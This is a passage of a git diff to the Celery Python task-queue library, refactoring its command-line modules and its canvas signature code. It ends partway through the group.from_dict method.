@@ -1,9 +1,14 @@
"""Celery Command Line Interface."""
import os
+import pathlib
+import traceback
import click
+import click.exceptions
from click.types import ParamType
from click_didyoumean import DYMGroup
+from click_plugins import with_plugins
+from pkg_resources import iter_entry_points
from celery import VERSION_BANNER
from celery.app.utils import find_app
@@ -24,6 +29,19 @@
from celery.bin.upgrade import upgrade
from celery.bin.worker import worker
+UNABLE_TO_LOAD_APP_MODULE_NOT_FOUND = click.style("""
+Unable to load celery application.
+The module {0} was not found.""", fg='red')
+
+UNABLE_TO_LOAD_APP_ERROR_OCCURRED = click.style("""
+Unable to load celery application.
+While trying to load the module {0} the following error occurred:
+{1}""", fg='red')
+
+UNABLE_TO_LOAD_APP_APP_MISSING = click.style("""
+Unable to load celery application.
+{0}""")
+
class App(ParamType):
"""Application option."""
@@ -33,13 +51,27 @@ class App(ParamType):
def convert(self, value, param, ctx):
try:
return find_app(value)
- except (ModuleNotFoundError, AttributeError) as e:
- self.fail(str(e))
+ except ModuleNotFoundError as e:
+ if e.name != value:
+ exc = traceback.format_exc()
+ self.fail(
+ UNABLE_TO_LOAD_APP_ERROR_OCCURRED.format(value, exc)
+ )
+ self.fail(UNABLE_TO_LOAD_APP_MODULE_NOT_FOUND.format(e.name))
+ except AttributeError as e:
+ attribute_name = e.args[0].capitalize()
+ self.fail(UNABLE_TO_LOAD_APP_APP_MISSING.format(attribute_name))
+ except Exception:
+ exc = traceback.format_exc()
+ self.fail(
+ UNABLE_TO_LOAD_APP_ERROR_OCCURRED.format(value, exc)
+ )
APP = App()
+@with_plugins(iter_entry_points('celery.commands'))
@click.group(cls=DYMGroup, invoke_without_command=True)
@click.option('-A',
'--app',
@@ -66,6 +98,9 @@ def convert(self, value, param, ctx):
help_group="Global Options")
@click.option('--workdir',
cls=CeleryOption,
+ type=pathlib.Path,
+ callback=lambda _, __, wd: os.chdir(wd) if wd else None,
+ is_eager=True,
help_group="Global Options")
@click.option('-C',
'--no-color',
@@ -93,8 +128,6 @@ def celery(ctx, app, broker, result_backend, loader, config, workdir,
click.echo(ctx.get_help())
ctx.exit()
- if workdir:
- os.chdir(workdir)
if loader:
# Default app takes loader from this env (Issue #1066).
os.environ['CELERY_LOADER'] = loader
@@ -104,13 +137,17 @@ def celery(ctx, app, broker, result_backend, loader, config, workdir,
os.environ['CELERY_RESULT_BACKEND'] = result_backend
if config:
os.environ['CELERY_CONFIG_MODULE'] = config
- ctx.obj = CLIContext(app=app, no_color=no_color, workdir=workdir, quiet=quiet)
+ ctx.obj = CLIContext(app=app, no_color=no_color, workdir=workdir,
+ quiet=quiet)
# User options
worker.params.extend(ctx.obj.app.user_options.get('worker', []))
beat.params.extend(ctx.obj.app.user_options.get('beat', []))
events.params.extend(ctx.obj.app.user_options.get('events', []))
+ for command in celery.commands.values():
+ command.params.extend(ctx.obj.app.user_options.get('preload', []))
+
@celery.command(cls=CeleryCommand)
@click.pass_context
@@ -139,6 +176,32 @@ def report(ctx):
celery.add_command(shell)
celery.add_command(multi)
+# Monkey-patch click to display a custom error
+# when -A or --app are used as sub-command options instead of as options
+# of the global command.
+
+previous_show_implementation = click.exceptions.NoSuchOption.show
+
+WRONG_APP_OPTION_USAGE_MESSAGE = """You are using `{option_name}` as an option of the {info_name} sub-command:
+celery {info_name} {option_name} celeryapp <...>
+
+The support for this usage was removed in Celery 5.0. Instead you should use `{option_name}` as a global option:
+celery {option_name} celeryapp {info_name} <...>"""
+
+
+def _show(self, file=None):
+ if self.option_name in ('-A', '--app'):
+ self.ctx.obj.error(
+ WRONG_APP_OPTION_USAGE_MESSAGE.format(
+ option_name=self.option_name,
+ info_name=self.ctx.info_name),
+ fg='red'
+ )
+ previous_show_implementation(self, file=file)
+
+
+click.exceptions.NoSuchOption.show = _show
+
def main() -> int:
"""Start celery umbrella command.
diff --git a/celery/bin/control.py b/celery/bin/control.py
index a48de89ce72..fbd3730c490 100644
--- a/celery/bin/control.py
+++ b/celery/bin/control.py
@@ -4,7 +4,9 @@
import click
from kombu.utils.json import dumps
-from celery.bin.base import COMMA_SEPARATED_LIST, CeleryCommand, CeleryOption
+from celery.bin.base import (COMMA_SEPARATED_LIST, CeleryCommand,
+ CeleryOption, handle_preload_options)
+from celery.exceptions import CeleryCommandException
from celery.platforms import EX_UNAVAILABLE
from celery.utils import text
from celery.worker.control import Panel
@@ -71,6 +73,7 @@ def _compile_arguments(action, args):
help_group='Remote Control Options',
help='Use json as output format.')
@click.pass_context
+@handle_preload_options
def status(ctx, timeout, destination, json, **kwargs):
"""Show list of workers that are online."""
callback = None if json else partial(_say_remote_command_reply, ctx)
@@ -79,8 +82,10 @@ def status(ctx, timeout, destination, json, **kwargs):
callback=callback).ping()
if not replies:
- ctx.obj.echo('No nodes replied within time constraint')
- return EX_UNAVAILABLE
+ raise CeleryCommandException(
+ message='No nodes replied within time constraint',
+ exit_code=EX_UNAVAILABLE
+ )
if json:
ctx.obj.echo(dumps(replies))
@@ -90,7 +95,8 @@ def status(ctx, timeout, destination, json, **kwargs):
nodecount, text.pluralize(nodecount, 'node')))
-@click.command(cls=CeleryCommand)
+@click.command(cls=CeleryCommand,
+ context_settings={'allow_extra_args': True})
@click.argument("action", type=click.Choice([
name for name, info in Panel.meta.items()
if info.type == 'inspect' and info.visible
@@ -115,6 +121,7 @@ def status(ctx, timeout, destination, json, **kwargs):
help_group='Remote Control Options',
help='Use json as output format.')
@click.pass_context
+@handle_preload_options
def inspect(ctx, action, timeout, destination, json, **kwargs):
"""Inspect the worker at runtime.
@@ -122,16 +129,23 @@ def inspect(ctx, action, timeout, destination, json, **kwargs):
"""
callback = None if json else partial(_say_remote_command_reply, ctx,
show_reply=True)
- replies = ctx.obj.app.control.inspect(timeout=timeout,
+ arguments = _compile_arguments(action, ctx.args)
+ inspect = ctx.obj.app.control.inspect(timeout=timeout,
destination=destination,
- callback=callback)._request(action)
+ callback=callback)
+ replies = inspect._request(action,
+ **arguments)
if not replies:
- ctx.obj.echo('No nodes replied within time constraint')
- return EX_UNAVAILABLE
+ raise CeleryCommandException(
+ message='No nodes replied within time constraint',
+ exit_code=EX_UNAVAILABLE
+ )
if json:
ctx.obj.echo(dumps(replies))
+ return
+
nodecount = len(replies)
if not ctx.obj.quiet:
ctx.obj.echo('\n{} {} online.'.format(
@@ -164,6 +178,7 @@ def inspect(ctx, action, timeout, destination, json, **kwargs):
help_group='Remote Control Options',
help='Use json as output format.')
@click.pass_context
+@handle_preload_options
def control(ctx, action, timeout, destination, json):
"""Workers remote control.
@@ -180,8 +195,10 @@ def control(ctx, action, timeout, destination, json):
arguments=arguments)
if not replies:
- ctx.obj.echo('No nodes replied within time constraint')
- return EX_UNAVAILABLE
+ raise CeleryCommandException(
+ message='No nodes replied within time constraint',
+ exit_code=EX_UNAVAILABLE
+ )
if json:
ctx.obj.echo(dumps(replies))
diff --git a/celery/bin/events.py b/celery/bin/events.py
index 0e3bd1a8aea..fa37c8352fc 100644
--- a/celery/bin/events.py
+++ b/celery/bin/events.py
@@ -4,13 +4,14 @@
import click
-from celery.bin.base import LOG_LEVEL, CeleryDaemonCommand, CeleryOption
+from celery.bin.base import (LOG_LEVEL, CeleryDaemonCommand, CeleryOption,
+ handle_preload_options)
from celery.platforms import detached, set_process_title, strargv
def _set_process_status(prog, info=''):
prog = '{}:{}'.format('celery events', prog)
- info = '{} {}'.format(info, strargv(sys.argv))
+ info = f'{info} {strargv(sys.argv)}'
return set_process_title(prog, info=info)
@@ -78,6 +79,7 @@ def _run_evtop(app):
help_group="Snapshot",
help="Logging level.")
@click.pass_context
+@handle_preload_options
def events(ctx, dump, camera, detach, frequency, maxrate, loglevel, **kwargs):
"""Event-stream utilities."""
app = ctx.obj.app
diff --git a/celery/bin/graph.py b/celery/bin/graph.py
index 3013077b4b5..d4d6f16205f 100644
--- a/celery/bin/graph.py
+++ b/celery/bin/graph.py
@@ -4,12 +4,14 @@
import click
-from celery.bin.base import CeleryCommand
+from celery.bin.base import CeleryCommand, handle_preload_options
from celery.utils.graph import DependencyGraph, GraphFormatter
@click.group()
-def graph():
+@click.pass_context
+@handle_preload_options
+def graph(ctx):
"""The ``celery graph`` command."""
@@ -72,7 +74,7 @@ class Thread(Node):
def __init__(self, label, **kwargs):
self.real_label = label
super().__init__(
- label='thr-{}'.format(next(tids)),
+ label=f'thr-{next(tids)}',
pos=0,
)
@@ -139,7 +141,7 @@ def maybe_abbr(l, name, max=Wmax):
size = len(l)
abbr = max and size > max
if 'enumerate' in args:
- l = ['{}{}'.format(name, subscript(i + 1))
+ l = [f'{name}{subscript(i + 1)}'
for i, obj in enumerate(l)]
if abbr:
l = l[0:max - 1] + [l[size - 1]]
diff --git a/celery/bin/list.py b/celery/bin/list.py
index fefc5e73fde..f170e627223 100644
--- a/celery/bin/list.py
+++ b/celery/bin/list.py
@@ -1,11 +1,13 @@
"""The ``celery list bindings`` command, used to inspect queue bindings."""
import click
-from celery.bin.base import CeleryCommand
+from celery.bin.base import CeleryCommand, handle_preload_options
@click.group(name="list")
-def list_():
+@click.pass_context
+@handle_preload_options
+def list_(ctx):
"""Get info from broker.
Note:
diff --git a/celery/bin/logtool.py b/celery/bin/logtool.py
index 07dbffa8767..ae64c3e473f 100644
--- a/celery/bin/logtool.py
+++ b/celery/bin/logtool.py
@@ -5,7 +5,7 @@
import click
-from celery.bin.base import CeleryCommand
+from celery.bin.base import CeleryCommand, handle_preload_options
__all__ = ('logtool',)
@@ -111,7 +111,9 @@ def report(self):
@click.group()
-def logtool():
+@click.pass_context
+@handle_preload_options
+def logtool(ctx):
"""The ``celery logtool`` command."""
diff --git a/celery/bin/migrate.py b/celery/bin/migrate.py
index c5ba9b33c43..febaaaacab2 100644
--- a/celery/bin/migrate.py
+++ b/celery/bin/migrate.py
@@ -2,7 +2,8 @@
import click
from kombu import Connection
-from celery.bin.base import CeleryCommand, CeleryOption
+from celery.bin.base import (CeleryCommand, CeleryOption,
+ handle_preload_options)
from celery.contrib.migrate import migrate_tasks
@@ -44,6 +45,7 @@
help_group='Migration Options',
help='Continually migrate tasks until killed.')
@click.pass_context
+@handle_preload_options
def migrate(ctx, source, destination, **kwargs):
"""Migrate tasks from one broker to another.
diff --git a/celery/bin/multi.py b/celery/bin/multi.py
index 3e999ab2ab5..3a9e026b88a 100644
--- a/celery/bin/multi.py
+++ b/celery/bin/multi.py
@@ -67,7 +67,7 @@
$ celery multi show 10 -l INFO -Q:1-3 images,video -Q:4,5 data
-Q default -L:4,5 DEBUG
- $ # Additional options are added to each celery worker' comamnd,
+ $ # Additional options are added to each celery worker's command,
$ # but you can also modify the options for ranges of, or specific workers
$ # 3 workers: Two with 3 processes, and one with 10 processes.
@@ -108,7 +108,7 @@
from celery import VERSION_BANNER
from celery.apps.multi import Cluster, MultiParser, NamespacedOptionParser
-from celery.bin.base import CeleryCommand
+from celery.bin.base import CeleryCommand, handle_preload_options
from celery.platforms import EX_FAILURE, EX_OK, signals
from celery.utils import term
from celery.utils.text import pluralize
@@ -468,7 +468,13 @@ def DOWN(self):
}
)
@click.pass_context
+@handle_preload_options
def multi(ctx):
"""Start multiple worker instances."""
cmd = MultiTool(quiet=ctx.obj.quiet, no_color=ctx.obj.no_color)
- return cmd.execute_from_commandline([''] + ctx.args)
+ # In 4.x, celery multi ignores the global --app option.
+ # Since in 5.0 the --app option is global only we
+ # rearrange the arguments so that the MultiTool will parse them correctly.
+ args = sys.argv[1:]
+ args = args[args.index('multi'):] + args[:args.index('multi')]
+ return cmd.execute_from_commandline(args)
diff --git a/celery/bin/purge.py b/celery/bin/purge.py
index 38245d02ff0..2629ac7eff3 100644
--- a/celery/bin/purge.py
+++ b/celery/bin/purge.py
@@ -1,7 +1,8 @@
"""The ``celery purge`` program, used to delete messages from queues."""
import click
-from celery.bin.base import COMMA_SEPARATED_LIST, CeleryCommand, CeleryOption
+from celery.bin.base import (COMMA_SEPARATED_LIST, CeleryCommand,
+ CeleryOption, handle_preload_options)
from celery.utils import text
@@ -25,6 +26,7 @@
help_group='Purging Options',
help="Comma separated list of queues names not to purge.")
@click.pass_context
+@handle_preload_options
def purge(ctx, force, queues, exclude_queues):
"""Erase all messages from all known task queues.
@@ -32,10 +34,10 @@ def purge(ctx, force, queues, exclude_queues):
There's no undo operation for this command.
"""
- queues = queues or set()
- exclude_queues = exclude_queues or set()
app = ctx.obj.app
- names = (queues or set(app.amqp.queues.keys())) - exclude_queues
+ queues = set(queues or app.amqp.queues.keys())
+ exclude_queues = set(exclude_queues or [])
+ names = queues - exclude_queues
qnum = len(names)
if names:
diff --git a/celery/bin/result.py b/celery/bin/result.py
index d90421c4cde..c126fb588ee 100644
--- a/celery/bin/result.py
+++ b/celery/bin/result.py
@@ -1,7 +1,8 @@
"""The ``celery result`` program, used to inspect task results."""
import click
-from celery.bin.base import CeleryCommand, CeleryOption
+from celery.bin.base import (CeleryCommand, CeleryOption,
+ handle_preload_options)
@click.command(cls=CeleryCommand)
@@ -17,6 +18,7 @@
help_group='Result Options',
help="Show traceback instead.")
@click.pass_context
+@handle_preload_options
def result(ctx, task_id, task, traceback):
"""Print the return value for a given task id."""
app = ctx.obj.app
diff --git a/celery/bin/shell.py b/celery/bin/shell.py
index 966773c5d11..378448a24cf 100644
--- a/celery/bin/shell.py
+++ b/celery/bin/shell.py
@@ -6,7 +6,8 @@
import click
-from celery.bin.base import CeleryCommand, CeleryOption
+from celery.bin.base import (CeleryCommand, CeleryOption,
+ handle_preload_options)
def _invoke_fallback_shell(locals):
@@ -114,6 +115,7 @@ def _invoke_default_shell(locals):
help_group="Shell Options",
help="Use gevent.")
@click.pass_context
+@handle_preload_options
def shell(ctx, ipython=False, bpython=False,
python=False, without_tasks=False, eventlet=False,
gevent=False):
@@ -130,7 +132,7 @@ def shell(ctx, ipython=False, bpython=False,
import_module('celery.concurrency.eventlet')
if gevent:
import_module('celery.concurrency.gevent')
- import celery.task.base
+ import celery
app = ctx.obj.app
app.loader.import_default_modules()
diff --git a/celery/bin/upgrade.py b/celery/bin/upgrade.py
index 1518297172c..cd9a695b702 100644
--- a/celery/bin/upgrade.py
+++ b/celery/bin/upgrade.py
@@ -5,12 +5,15 @@
import click
from celery.app import defaults
-from celery.bin.base import CeleryCommand, CeleryOption
+from celery.bin.base import (CeleryCommand, CeleryOption,
+ handle_preload_options)
from celery.utils.functional import pass1
@click.group()
-def upgrade():
+@click.pass_context
+@handle_preload_options
+def upgrade(ctx):
"""Perform upgrade between versions."""
diff --git a/celery/bin/worker.py b/celery/bin/worker.py
index 4d4c57aea16..7e0d3247ab5 100644
--- a/celery/bin/worker.py
+++ b/celery/bin/worker.py
@@ -9,8 +9,12 @@
from celery import concurrency
from celery.bin.base import (COMMA_SEPARATED_LIST, LOG_LEVEL,
- CeleryDaemonCommand, CeleryOption)
-from celery.platforms import EX_FAILURE, detached, maybe_drop_privileges
+ CeleryDaemonCommand, CeleryOption,
+ handle_preload_options)
+from celery.concurrency.base import BasePool
+from celery.exceptions import SecurityError
+from celery.platforms import (EX_FAILURE, EX_OK, detached,
+ maybe_drop_privileges)
from celery.utils.log import get_logger
from celery.utils.nodenames import default_nodename, host_format, node_format
@@ -37,13 +41,28 @@ class WorkersPool(click.Choice):
def __init__(self):
"""Initialize the workers pool option with the relevant choices."""
- super().__init__(('prefork', 'eventlet', 'gevent', 'solo'))
+ super().__init__(concurrency.get_available_pool_names())
def convert(self, value, param, ctx):
# Pools like eventlet/gevent needs to patch libs as early
# as possible.
- return concurrency.get_implementation(
- value) or ctx.obj.app.conf.worker_pool
+ if isinstance(value, type) and issubclass(value, BasePool):
+ return value
+
+ value = super().convert(value, param, ctx)
+ worker_pool = ctx.obj.app.conf.worker_pool
+ if value == 'prefork' and worker_pool:
+ # If we got the default pool through the CLI
+ # we need to check if the worker pool was configured.
+ # If the worker pool was configured, we shouldn't use the default.
+ value = concurrency.get_implementation(worker_pool)
+ else:
+ value = concurrency.get_implementation(value)
+
+ if not value:
+ value = concurrency.get_implementation(worker_pool)
+
+ return value
class Hostname(StringParamType):
@@ -93,12 +112,18 @@ def detach(path, argv, logfile=None, pidfile=None, uid=None,
executable=None, hostname=None):
"""Detach program by argv."""
fake = 1 if C_FAKEFORK else fake
+ # `detached()` will attempt to touch the logfile to confirm that error
+ # messages won't be lost after detaching stdout/err, but this means we need
+ # to pre-format it rather than relying on `setup_logging_subsystem()` like
+ # we can elsewhere.
+ logfile = node_format(logfile, hostname)
with detached(logfile, pidfile, uid, gid, umask, workdir, fake,
after_forkers=False):
try:
if executable is not None:
path = executable
os.execv(path, [path] + argv)
+ return EX_OK
except Exception: # pylint: disable=broad-except
if app is None:
from celery import current_app
@@ -107,7 +132,7 @@ def detach(path, argv, logfile=None, pidfile=None, uid=None,
'ERROR', logfile, hostname=hostname)
logger.critical("Can't exec %r", ' '.join([path] + argv),
exc_info=True)
- return EX_FAILURE
+ return EX_FAILURE
@click.command(cls=CeleryDaemonCommand,
@@ -131,9 +156,10 @@ def detach(path, argv, logfile=None, pidfile=None, uid=None,
'--statedb',
cls=CeleryOption,
type=click.Path(),
- callback=lambda ctx, _, value: value or ctx.obj.app.conf.worker_state_db,
+ callback=lambda ctx, _,
+ value: value or ctx.obj.app.conf.worker_state_db,
help_group="Worker Options",
- help="Path to the state database. The extension '.db' may be"
+ help="Path to the state database. The extension '.db' may be "
"appended to the filename.")
@click.option('-l',
'--loglevel',
@@ -152,7 +178,8 @@ def detach(path, argv, logfile=None, pidfile=None, uid=None,
@click.option('--prefetch-multiplier',
type=int,
metavar="",
- callback=lambda ctx, _, value: value or ctx.obj.app.conf.worker_prefetch_multiplier,
+ callback=lambda ctx, _,
+ value: value or ctx.obj.app.conf.worker_prefetch_multiplier,
cls=CeleryOption,
help_group="Worker Options",
help="Set custom prefetch multiplier value"
@@ -161,7 +188,8 @@ def detach(path, argv, logfile=None, pidfile=None, uid=None,
'--concurrency',
type=int,
metavar="",
- callback=lambda ctx, _, value: value or ctx.obj.app.conf.worker_concurrency,
+ callback=lambda ctx, _,
+ value: value or ctx.obj.app.conf.worker_concurrency,
cls=CeleryOption,
help_group="Pool Options",
help="Number of child processes processing the queue. "
@@ -178,6 +206,7 @@ def detach(path, argv, logfile=None, pidfile=None, uid=None,
'--task-events',
'--events',
is_flag=True,
+ default=None,
cls=CeleryOption,
help_group="Pool Options",
help="Send task-related events that can be captured by monitors"
@@ -231,15 +260,15 @@ def detach(path, argv, logfile=None, pidfile=None, uid=None,
cls=CeleryOption,
help_group="Queue Options")
@click.option('--without-gossip',
- default=False,
+ is_flag=True,
cls=CeleryOption,
help_group="Features")
@click.option('--without-mingle',
- default=False,
+ is_flag=True,
cls=CeleryOption,
help_group="Features")
@click.option('--without-heartbeat',
- default=False,
+ is_flag=True,
cls=CeleryOption,
help_group="Features", )
@click.option('--heartbeat-interval',
@@ -259,13 +288,15 @@ def detach(path, argv, logfile=None, pidfile=None, uid=None,
@click.option('-s',
'--schedule-filename',
'--schedule',
- callback=lambda ctx, _, value: value or ctx.obj.app.conf.beat_schedule_filename,
+ callback=lambda ctx, _,
+ value: value or ctx.obj.app.conf.beat_schedule_filename,
cls=CeleryOption,
help_group="Embedded Beat Options")
@click.option('--scheduler',
cls=CeleryOption,
help_group="Embedded Beat Options")
@click.pass_context
+@handle_preload_options
def worker(ctx, hostname=None, pool_cls=None, app=None, uid=None, gid=None,
loglevel=None, logfile=None, pidfile=None, statedb=None,
**kwargs):
@@ -280,52 +311,45 @@ def worker(ctx, hostname=None, pool_cls=None, app=None, uid=None, gid=None,
$ celery worker --autoscale=10,0
"""
- app = ctx.obj.app
- if ctx.args:
- try:
- app.config_from_cmdline(ctx.args, namespace='worker')
- except (KeyError, ValueError) as e:
- # TODO: Improve the error messages
- raise click.UsageError(
- "Unable to parse extra configuration from command line.\n"
- f"Reason: {e}", ctx=ctx)
- if kwargs.get('detach', False):
- params = ctx.params.copy()
- params.pop('detach')
- params.pop('logfile')
- params.pop('pidfile')
- params.pop('uid')
- params.pop('gid')
- umask = params.pop('umask')
- workdir = ctx.obj.workdir
- params.pop('hostname')
- executable = params.pop('executable')
- argv = ['-m', 'celery', 'worker']
- for arg, value in params.items():
- if isinstance(value, bool) and value:
- argv.append(f'--{arg}')
- else:
- if value is not None:
- argv.append(f'--{arg}')
- argv.append(str(value))
+ try:
+ app = ctx.obj.app
+ if ctx.args:
+ try:
+ app.config_from_cmdline(ctx.args, namespace='worker')
+ except (KeyError, ValueError) as e:
+ # TODO: Improve the error messages
+ raise click.UsageError(
+ "Unable to parse extra configuration from command line.\n"
+ f"Reason: {e}", ctx=ctx)
+ if kwargs.get('detach', False):
+ argv = ['-m', 'celery'] + sys.argv[1:]
+ if '--detach' in argv:
+ argv.remove('--detach')
+ if '-D' in argv:
+ argv.remove('-D')
+
return detach(sys.executable,
argv,
logfile=logfile,
pidfile=pidfile,
uid=uid, gid=gid,
- umask=umask,
- workdir=workdir,
+ umask=kwargs.get('umask', None),
+ workdir=kwargs.get('workdir', None),
app=app,
- executable=executable,
+ executable=kwargs.get('executable', None),
hostname=hostname)
- return
- maybe_drop_privileges(uid=uid, gid=gid)
- worker = app.Worker(
- hostname=hostname, pool_cls=pool_cls, loglevel=loglevel,
- logfile=logfile, # node format handled by celery.app.log.setup
- pidfile=node_format(pidfile, hostname),
- statedb=node_format(statedb, hostname),
- no_color=ctx.obj.no_color,
- **kwargs)
- worker.start()
- return worker.exitcode
+
+ maybe_drop_privileges(uid=uid, gid=gid)
+ worker = app.Worker(
+ hostname=hostname, pool_cls=pool_cls, loglevel=loglevel,
+ logfile=logfile, # node format handled by celery.app.log.setup
+ pidfile=node_format(pidfile, hostname),
+ statedb=node_format(statedb, hostname),
+ no_color=ctx.obj.no_color,
+ quiet=ctx.obj.quiet,
+ **kwargs)
+ worker.start()
+ return worker.exitcode
+ except SecurityError as e:
+ ctx.obj.error(e.args[0])
+ ctx.exit(1)
diff --git a/celery/canvas.py b/celery/canvas.py
index 7871f7b395d..8e9ac136f08 100644
--- a/celery/canvas.py
+++ b/celery/canvas.py
@@ -13,6 +13,7 @@
from functools import partial as _partial
from functools import reduce
from operator import itemgetter
+from types import GeneratorType
from kombu.utils.functional import fxrange, reprcall
from kombu.utils.objects import cached_property
@@ -25,7 +26,7 @@
from celery.utils.collections import ChainMap
from celery.utils.functional import _regen
from celery.utils.functional import chunks as _chunks
-from celery.utils.functional import (is_list, maybe_list, regen,
+from celery.utils.functional import (is_list, lookahead, maybe_list, regen,
seq_concat_item, seq_concat_seq)
from celery.utils.objects import getitem_property
from celery.utils.text import remove_repeating_from_task, truncate
@@ -56,12 +57,6 @@ def task_name_from(task):
return getattr(task, 'name', task)
-def _upgrade(fields, sig):
- """Used by custom signatures in .from_dict, to keep common fields."""
- sig.update(chord_size=fields.get('chord_size'))
- return sig
-
-
@abstract.CallableSignature.register
class Signature(dict):
"""Task Signature.
@@ -122,6 +117,9 @@ class Signature(dict):
TYPES = {}
_app = _type = None
+ # The following fields must not be changed during freezing/merging because
+ # to do so would disrupt completion of parent tasks
+ _IMMUTABLE_OPTIONS = {"group_id"}
@classmethod
def register_type(cls, name=None):
@@ -162,7 +160,6 @@ def __init__(self, task=None, args=None, kwargs=None, options=None,
options=dict(options or {}, **ex),
subtask_type=subtask_type,
immutable=immutable,
- chord_size=None,
)
def __call__(self, *partial_args, **partial_kwargs):
@@ -224,14 +221,22 @@ def apply_async(self, args=None, kwargs=None, route_name=None, **options):
def _merge(self, args=None, kwargs=None, options=None, force=False):
args = args if args else ()
kwargs = kwargs if kwargs else {}
- options = options if options else {}
+ if options is not None:
+ # We build a new options dictionary where values in `options`
+ # override values in `self.options` except for keys which are
+ # noted as being immutable (unrelated to signature immutability)
+ # implying that allowing their value to change would stall tasks
+ new_options = dict(self.options, **{
+ k: v for k, v in options.items()
+ if k not in self._IMMUTABLE_OPTIONS or k not in self.options
+ })
+ else:
+ new_options = self.options
if self.immutable and not force:
- return (self.args, self.kwargs,
- dict(self.options,
- **options) if options else self.options)
+ return (self.args, self.kwargs, new_options)
return (tuple(args) + tuple(self.args) if args else self.args,
dict(self.kwargs, **kwargs) if kwargs else self.kwargs,
- dict(self.options, **options) if options else self.options)
+ new_options)
def clone(self, args=None, kwargs=None, **opts):
"""Create a copy of this signature.
@@ -254,7 +259,6 @@ def clone(self, args=None, kwargs=None, **opts):
'kwargs': kwargs,
'options': deepcopy(opts),
'subtask_type': self.subtask_type,
- 'chord_size': self.chord_size,
'immutable': self.immutable},
app=self._app)
signature._type = self._type
@@ -285,8 +289,8 @@ def freeze(self, _id=None, group_id=None, chord=None,
if parent_id:
opts['parent_id'] = parent_id
if 'reply_to' not in opts:
- opts['reply_to'] = self.app.oid
- if group_id:
+ opts['reply_to'] = self.app.thread_oid
+ if group_id and "group_id" not in opts:
opts['group_id'] = group_id
if chord:
opts['chord'] = chord
@@ -481,7 +485,7 @@ def __repr__(self):
return self.reprcall()
def items(self):
- for k, v in dict.items(self):
+ for k, v in super().items():
yield k.decode() if isinstance(k, bytes) else k, v
@property
@@ -519,8 +523,6 @@ def _apply_async(self):
kwargs = getitem_property('kwargs', 'Keyword arguments to task.')
options = getitem_property('options', 'Task execution options.')
subtask_type = getitem_property('subtask_type', 'Type of signature')
- chord_size = getitem_property(
- 'chord_size', 'Size of chord (if applicable)')
immutable = getitem_property(
'immutable', 'Flag set if no longer accepts new arguments')
@@ -593,14 +595,13 @@ def from_dict(cls, d, app=None):
if isinstance(tasks, tuple): # aaaargh
tasks = d['kwargs']['tasks'] = list(tasks)
tasks = [maybe_signature(task, app=app) for task in tasks]
- return _upgrade(d, _chain(tasks, app=app, **d['options']))
+ return _chain(tasks, app=app, **d['options'])
def __init__(self, *tasks, **options):
tasks = (regen(tasks[0]) if len(tasks) == 1 and is_list(tasks[0])
else tasks)
- Signature.__init__(
- self, 'celery.chain', (), {'tasks': tasks}, **options
- )
+ super().__init__('celery.chain', (), {'tasks': tasks}, **options
+ )
self._use_link = options.pop('use_link', None)
self.subtask_type = 'chain'
self._frozen = None
@@ -611,7 +612,7 @@ def __call__(self, *args, **kwargs):
def clone(self, *args, **kwargs):
to_signature = maybe_signature
- signature = Signature.clone(self, *args, **kwargs)
+ signature = super().clone(*args, **kwargs)
signature.kwargs['tasks'] = [
to_signature(sig, app=self._app, clone=True)
for sig in signature.kwargs['tasks']
@@ -640,7 +641,8 @@ def apply_async(self, args=None, kwargs=None, **options):
def run(self, args=None, kwargs=None, group_id=None, chord=None,
task_id=None, link=None, link_error=None, publisher=None,
- producer=None, root_id=None, parent_id=None, app=None, **options):
+ producer=None, root_id=None, parent_id=None, app=None,
+ group_index=None, **options):
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
args = args if args else ()
@@ -652,19 +654,27 @@ def run(self, args=None, kwargs=None, group_id=None, chord=None,
args = (tuple(args) + tuple(self.args)
if args and not self.immutable else self.args)
- tasks, results = self.prepare_steps(
+ tasks, results_from_prepare = self.prepare_steps(
args, kwargs, self.tasks, root_id, parent_id, link_error, app,
- task_id, group_id, chord,
+ task_id, group_id, chord, group_index=group_index,
)
- if results:
+ if results_from_prepare:
if link:
tasks[0].extend_list_option('link', link)
first_task = tasks.pop()
options = _prepare_chain_from_options(options, tasks, use_link)
- first_task.apply_async(**options)
- return results[0]
+ result_from_apply = first_task.apply_async(**options)
+ # If we only have a single task, it may be important that we pass
+ # the real result object rather than the one obtained via freezing.
+ # e.g. For `GroupResult`s, we need to pass back the result object
+ # which will actually have its promise fulfilled by the subtasks,
+ # something that will never occur for the frozen result.
+ if not tasks:
+ return result_from_apply
+ else:
+ return results_from_prepare[0]
def freeze(self, _id=None, group_id=None, chord=None,
root_id=None, parent_id=None, group_index=None):
@@ -889,15 +899,12 @@ class _basemap(Signature):
@classmethod
def from_dict(cls, d, app=None):
- return _upgrade(
- d, cls(*cls._unpack_args(d['kwargs']), app=app, **d['options']),
- )
+ return cls(*cls._unpack_args(d['kwargs']), app=app, **d['options'])
def __init__(self, task, it, **options):
- Signature.__init__(
- self, self._task_name, (),
- {'task': task, 'it': regen(it)}, immutable=True, **options
- )
+ super().__init__(self._task_name, (),
+ {'task': task, 'it': regen(it)}, immutable=True, **options
+ )
def apply_async(self, args=None, kwargs=None, **opts):
# need to evaluate generators
@@ -945,17 +952,13 @@ class chunks(Signature):
@classmethod
def from_dict(cls, d, app=None):
- return _upgrade(
- d, chunks(*cls._unpack_args(
- d['kwargs']), app=app, **d['options']),
- )
+ return chunks(*cls._unpack_args(d['kwargs']), app=app, **d['options'])
def __init__(self, task, it, n, **options):
- Signature.__init__(
- self, 'celery.chunks', (),
- {'task': task, 'it': regen(it), 'n': n},
- immutable=True, **options
- )
+ super().__init__('celery.chunks', (),
+ {'task': task, 'it': regen(it), 'n': n},
+ immutable=True, **options
+ )
def __call__(self, **options):
return self.apply_async(**options)
@@ -989,7 +992,10 @@ def _maybe_group(tasks, app):
elif isinstance(tasks, abstract.CallableSignature):
tasks = [tasks]
else:
- tasks = [signature(t, app=app) for t in tasks]
+ if isinstance(tasks, GeneratorType):
+ tasks = regen(signature(t, app=app) for t in tasks)
+ else:
+ tasks = [signature(t, app=app) for t in tasks]
return tasks
@@ -1028,9 +1034,15 @@ class group(Signature):
@classmethod
def from_dict(cls, d, app=None):
- return _upgrade(
- d, group(d['kwargs']['tasks'], app=app, **d['options']),
+ # We need to mutate the `kwargs` element in place to avoid confusing
+ # `freeze()` implementations which end up here and expect to be able to
+ # access elements from that dictionary later and refer to objects
+ # canonicalized here
+ orig_tasks = d["kwargs"]["tasks"]
+ d["kwargs"]["tasks"] = rebuilt_tasks = type(orig_tasks)(
+ maybe_signature(task, app=app) for task in orig_tasks
)
